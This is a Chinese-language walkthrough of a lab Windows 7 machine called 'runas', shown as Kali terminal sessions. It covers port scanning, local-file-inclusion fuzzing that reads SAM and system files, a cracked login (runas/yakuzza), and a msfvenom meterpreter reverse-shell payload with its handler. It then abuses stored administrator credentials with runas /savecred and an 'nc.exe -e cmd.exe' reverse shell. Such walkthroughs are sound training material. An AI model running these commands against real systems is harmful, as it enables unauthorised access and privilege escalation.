image-20250721112052579

┌──(root㉿kali)-[/myift/bachang/win/runas]
└─# arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:96:80:36, IPv4: 192.168.56.103
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0e       (Unknown: locally administered)
192.168.56.100  08:00:27:81:30:5f       PCS Systemtechnik GmbH
192.168.56.109  08:00:27:56:13:ce       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.237 seconds (114.44 hosts/sec). 3 responded
                                                                                                                                                                                                                  
┌──(root㉿kali)-[/myift/bachang/win/runas]
└─# nmap -sV -sC 192.168.56.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-20 23:22 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 32.25% done; ETC: 23:22 (0:00:02 remaining)
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 8.33% done; ETC: 23:23 (0:01:06 remaining)
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 41.67% done; ETC: 23:22 (0:00:15 remaining)
Nmap scan report for 192.168.56.109
Host is up (0.00022s latency).
Not shown: 988 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.57 ((Win64) PHP/7.2.0)
|_http-server-header: Apache/2.4.57 (Win64) PHP/7.2.0
|_http-title: Index of /
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
| rdp-ntlm-info: 
|   Target_Name: RUNAS-PC
|   NetBIOS_Domain_Name: RUNAS-PC
|   NetBIOS_Computer_Name: RUNAS-PC
|   DNS_Domain_Name: runas-PC
|   DNS_Computer_Name: runas-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2025-07-21T03:23:03+00:00
|_ssl-date: 2025-07-21T03:23:21+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=runas-PC
| Not valid before: 2025-07-20T03:15:10
|_Not valid after:  2026-01-19T03:15:10
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 08:00:27:56:13:CE (Oracle VirtualBox virtual NIC)
Service Info: Host: RUNAS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -36m01s, deviation: 1h20m30s, median: -2s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: runas-PC
|   NetBIOS computer name: RUNAS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-07-21T06:23:02+03:00
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: RUNAS-PC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:56:13:ce (Oracle VirtualBox virtual NIC)
| smb2-time: 
|   date: 2025-07-21T03:23:02
|_  start_date: 2025-07-21T03:15:10

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.27 seconds

去web服务看一下

image-20250721112714280

image-20250721113904907

有任意文件读取

image-20250721114038793

image-20250721114002480

这里也是非常的不合理

直接给两个flag读出来完了

image-20250721114131649

我们假装不知道flag的位置,先进行模糊匹配看看有什么东西

┌──(root㉿kali)-[/usr/share/seclists/Fuzzing/LFI]
└─# curl -s -w "%{size_download}\n" "http://192.168.56.109/index.php?file=566" -o /dev/null
429
                                                                                                                                                                                                                  
┌──(root㉿kali)-[/usr/share/seclists/Fuzzing/LFI]
└─# ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -u "http://192.168.56.109/index.php?file=FUZZ" -fs 429

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.109/index.php?file=FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 429
________________________________________________

C:/WINDOWS/Repair/SAM   [Status: 200, Size: 425, Words: 68, Lines: 18, Duration: 11ms]
C:/WINDOWS/System32/drivers/etc/hosts [Status: 200, Size: 1375, Words: 260, Lines: 39, Duration: 3ms]
C:/Windows/system32/config/regback/sam [Status: 200, Size: 627, Words: 84, Lines: 20, Duration: 3ms]
C:/Windows/system32/config/regback/security [Status: 200, Size: 632, Words: 84, Lines: 20, Duration: 2ms]
C:/Windows/system32/config/regback/default [Status: 200, Size: 631, Words: 84, Lines: 20, Duration: 4ms]
C:/Windows/System32/inetsrv/config/applicationHost.config [Status: 200, Size: 79253, Words: 12108, Lines: 821, Duration: 1ms]
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml [Status: 200, Size: 58608, Words: 8247, Lines: 599, Duration: 4ms]
C:/php/php.ini          [Status: 200, Size: 85387, Words: 11106, Lines: 1929, Duration: 39ms]
C:/Users/Administrator/NTUser.dat [Status: 200, Size: 425, Words: 68, Lines: 18, Duration: 50ms]
C:/Windows/win.ini      [Status: 200, Size: 1042, Words: 103, Lines: 46, Duration: 63ms]
C:/Windows/system32/config/regback/system [Status: 200, Size: 630, Words: 84, Lines: 20, Duration: 115ms]
C:/Windows/system32/config/regback/software [Status: 200, Size: 632, Words: 84, Lines: 20, Duration: 119ms]
c:/WINDOWS/system32/drivers/etc/hosts [Status: 200, Size: 1375, Words: 260, Lines: 39, Duration: 1ms]
c:/WINDOWS/system32/drivers/etc/networks [Status: 200, Size: 946, Words: 171, Lines: 34, Duration: 2ms]
c:/WINDOWS/system32/drivers/etc/services [Status: 200, Size: 19622, Words: 8783, Lines: 303, Duration: 4ms]
c:/php/php.ini          [Status: 200, Size: 85387, Words: 11106, Lines: 1929, Duration: 129ms]
c:/WINDOWS/setupact.log [Status: 200, Size: 25774, Words: 2482, Lines: 315, Duration: 4ms]
c:/PHP/php.ini          [Status: 200, Size: 85387, Words: 11106, Lines: 1929, Duration: 137ms]
c:/WINDOWS/setuperr.log [Status: 200, Size: 425, Words: 68, Lines: 18, Duration: 6ms]
c:/WINDOWS/WindowsUpdate.log [Status: 200, Size: 111314, Words: 9007, Lines: 1208, Duration: 4ms]
C:/Windows/repair/system [Status: 200, Size: 425, Words: 68, Lines: 18, Duration: 183ms]
c:/WINDOWS/system32/drivers/etc/protocol [Status: 200, Size: 1973, Words: 539, Lines: 45, Duration: 51ms]
c:/WINDOWS/system32/drivers/etc/lmhosts.sam [Status: 200, Size: 4760, Words: 774, Lines: 97, Duration: 54ms]
:: Progress: [236/236] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::

image-20250721160951083

找到一组md5

image-20250721161650502

得到账号密码

runas/yakuzza

image-20250721162625035

接下来就是提权先拿到一个

meterpreter shell

┌──(root㉿kali)-[/myift/bachang/win/runas]
└─# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.103 lport=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes                                                                                                                                                                              
┌──(root㉿kali)-[/myift/bachang/win/runas]
└─# python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.56.109 - - [21/Jul/2025 04:58:34] "GET /shell.exe HTTP/1.1" 200 -
192.168.56.109 - - [21/Jul/2025 04:58:34] "GET /shell.exe HTTP/1.1" 200 -
192.168.56.109 - - [21/Jul/2025 04:59:28] "GET /shell.exe HTTP/1.1" 200 -
192.168.56.109 - - [21/Jul/2025 04:59:28] "GET /shell.exe HTTP/1.1" 200 -


msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.56.103
LHOST => 192.168.56.103
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444                                                                                               
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.103:4444 
[*] Sending stage (177734 bytes) to 192.168.56.109
[*] Meterpreter session 26 opened (192.168.56.103:4444 -> 192.168.56.109:49215) at 2025-07-21 05:11:31 -0400

meterpreter >

meterpreter > background
[*] Backgrounding session 26...
msf6 exploit(multi/handler) > 
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                Connection
  --  ----  ----                     -----------                ----------
  2         shell                                               192.168.56.103:4444 -> 192.168.56.109:49193 (192.168.56.109)
  3         shell                                               192.168.56.103:4444 -> 192.168.56.109:49194 (192.168.56.109)
  5         shell                                               192.168.56.103:4444 -> 192.168.56.109:49196 (192.168.56.109)
  6         shell                                               192.168.56.103:4444 -> 192.168.56.109:49197 (192.168.56.109)
  9         shell                                               192.168.56.103:4444 -> 192.168.56.109:49199 (192.168.56.109)
  10        shell                                               192.168.56.103:4444 -> 192.168.56.109:49200 (192.168.56.109)
  11        shell                                               192.168.56.103:4444 -> 192.168.56.109:49201 (192.168.56.109)
  13        shell                                               192.168.56.103:4444 -> 192.168.56.109:49202 (192.168.56.109)
  14        shell                                               192.168.56.103:4444 -> 192.168.56.109:49203 (192.168.56.109)
  15        shell                                               192.168.56.103:4444 -> 192.168.56.109:49204 (192.168.56.109)
  16        shell                                               192.168.56.103:4444 -> 192.168.56.109:49205 (192.168.56.109)
  17        shell                                               192.168.56.103:4444 -> 192.168.56.109:49206 (192.168.56.109)
  18        shell                                               192.168.56.103:4444 -> 192.168.56.109:49207 (192.168.56.109)
  19        shell                                               192.168.56.103:4444 -> 192.168.56.109:49208 (192.168.56.109)
  20        shell                                               192.168.56.103:4444 -> 192.168.56.109:49209 (192.168.56.109)
  21        shell                                               192.168.56.103:4444 -> 192.168.56.109:49210 (192.168.56.109)
  22        shell                                               192.168.56.103:4444 -> 192.168.56.109:49211 (192.168.56.109)
  23        shell                                               192.168.56.103:4444 -> 192.168.56.109:49212 (192.168.56.109)
  24        shell                                               192.168.56.103:4444 -> 192.168.56.109:49213 (192.168.56.109)
  25        shell                                               192.168.56.103:4444 -> 192.168.56.109:49214 (192.168.56.109)
  26        meterpreter x86/windows  runas-PC\runas @ RUNAS-PC  192.168.56.103:4444 -> 192.168.56.109:49215 (192.168.56.109)

msf6 post(multi/recon/local_exploit_suggester) > set session 26
session => 26
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.56.109 - Collecting local exploits for x86/windows...
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/logging-2.4.0/lib/logging.rb:10: warning: /usr/lib/x86_64-linux-gnu/ruby/3.3.0/syslog.so was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 3.4.0.
You can add syslog to your Gemfile or gemspec to silence this warning.
Also please contact the author of logging-2.4.0 to request adding syslog into its gemspec.
[*] 192.168.56.109 - 203 exploit checks are being tried...
[+] 192.168.56.109 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 192.168.56.109 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.56.109 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 192.168.56.109 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 192.168.56.109 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.56.109 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.56.109 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 192.168.56.109 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 42 / 42
[*] 192.168.56.109 - Valid modules for session 26:
=============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_comhijack                      Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
 4   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.
 5   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ntusermndragover                         Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.
 10  exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
 11  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.
 12  exploit/windows/local/anyconnect_lpe                           No                       The target is not exploitable. vpndownloader.exe not found on file system
 13  exploit/windows/local/bits_ntlm_token_impersonation            No                       The target is not exploitable.
 14  exploit/windows/local/bthpan                                   No                       The target is not exploitable.
 15  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.
 16  exploit/windows/local/bypassuac_sluihijack                     No                       The target is not exploitable.
 17  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found
 18  exploit/windows/local/cve_2020_1048_printerdemon               No                       The target is not exploitable.
 19  exploit/windows/local/cve_2020_1337_printerdemon               No                       The target is not exploitable.
 20  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found
 21  exploit/windows/local/ikeext_service                           No                       The check raised an exception.
 22  exploit/windows/local/ipass_launch_app                         No                       The check raised an exception.
 23  exploit/windows/local/lenovo_systemupdate                      No                       The check raised an exception.
 24  exploit/windows/local/lexmark_driver_privesc                   No                       The check raised an exception.
 25  exploit/windows/local/mqac_write                               No                       The target is not exploitable.
 26  exploit/windows/local/ms10_015_kitrap0d                        No                       The target is not exploitable.
 27  exploit/windows/local/ms13_053_schlamperei                     No                       The target is not exploitable.
 28  exploit/windows/local/ms13_081_track_popup_menu                No                       Cannot reliably check exploitability.
 29  exploit/windows/local/ms14_070_tcpip_ioctl                     No                       The target is not exploitable.
 30  exploit/windows/local/ms15_004_tswbproxy                       No                       The target is not exploitable.
 31  exploit/windows/local/ms16_016_webdav                          No                       The target is not exploitable.
 32  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  No                       The check raised an exception.
 33  exploit/windows/local/ms16_075_reflection                      No                       The target is not exploitable.
 34  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.
 35  exploit/windows/local/ms_ndproxy                               No                       The target is not exploitable.
 36  exploit/windows/local/novell_client_nicm                       No                       The target is not exploitable.
 37  exploit/windows/local/ntapphelpcachecontrol                    No                       The check raised an exception.
 38  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.
 39  exploit/windows/local/ppr_flatten_rec                          No                       The target is not exploitable.
 40  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found
 41  exploit/windows/local/virtual_box_guest_additions              No                       The target is not exploitable.
 42  exploit/windows/local/webexec                                  No                       The check raised an exception.

[*] Post module execution completed

开始尝试可用的漏洞

所有的都试了没一个行的

做信息收集

C:\Users\runas>whoami /priv
whoami /priv

AYRICALIK B�LG�LER�
----------------------

Ayr�cal�k Ad�                 A��klama                           Durum     
============================= ================================== ==========
SeShutdownPrivilege           Sistemi kapat                      Devre D���
SeChangeNotifyPrivilege       �apraz ge�i� denetimini atla       Etkin     
SeUndockPrivilege             Bilgisayar� takma biriminden ��kar Devre D���
SeIncreaseWorkingSetPrivilege ��lem �al��ma k�mesini art�r       Devre D���
SeTimeZonePrivilege           Saat dilimini de�i�tir             Devre D���

C:\Users\runas>cmdkey /list
cmdkey /list

Depolanan ge�erli kimlik bilgileri:

    Hedef: Domain:interactive=RUNAS-PC\Administrator
    T�r: Etki Alan� Parolas� 
    Kullan�c�: RUNAS-PC\Administrator


cmdkey /list 用于列出当前用户存储的凭据(如用户名和密码),这些凭据通常用于自动登录到远程计算机、网络共享或其他受身份验证保护的资源。

发现任何值得尝试的凭据,可以将它们与 runas 命令和 /savecred 选项一起使用,如下所示。

runas /savecred /user:Administrator cmd.exe

该命令用于以 Administrator 用户的身份运行 cmd.exe(命令提示符),并使用 savecred 选项存储密码,以后运行相同的命令时无需再次输入密码。

image-20250721182348085

如果没有远程左面的话就传进去一个nc.exe然后弹回来一个新的shell即可

runas /env /noprofile /savecred /user:Administrator "C:\Users\runas\nc.exe 192.168.10.103 1234 -e cmd.exe"